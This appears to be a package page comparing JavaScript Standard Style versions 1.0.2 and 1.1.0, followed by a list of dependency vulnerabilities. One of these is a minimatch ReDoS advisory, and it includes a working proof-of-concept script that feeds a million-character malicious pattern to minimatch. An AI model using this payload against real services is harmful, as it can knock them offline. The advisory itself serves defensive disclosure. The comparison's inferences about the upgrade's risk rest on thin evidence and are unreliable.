Standard version 1.1.0 represents a minor update over the previous stable version, 1.0.2, in the popular JavaScript Standard Style package. Both versions maintain the core function of providing a consistent and opinionated code style for JavaScript projects, promoting readability and maintainability across development teams. Crucially, the declared dependencies remain identical between the two versions, including find, jscs, split, and jshint. This indicates that the underlying tools and linters used for style enforcement have not been significantly altered.
The most noticeable difference lies in the releaseDate, with version 1.1.0 being published slightly later than 1.0.2, only about an hour and a half that confirms only minor changes. Developers considering upgrading should note that there are no apparent changes to dependencies or core functionality. This suggests that the upgrade from 1.0.2 to 1.1.0 is likely a low-risk endeavor, potentially addressing minor bug fixes, internal improvements, or documentation updates that would enhance the developer experience without introducing breaking changes or requiring code modifications. The shared dependencies ensure compatibility across diverse JavaScript environments meaning a smooth update process for existing users while guaranteeing the continued use of the familiar standard to new developers.
All the vulnerabilities related to the version 1.1.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.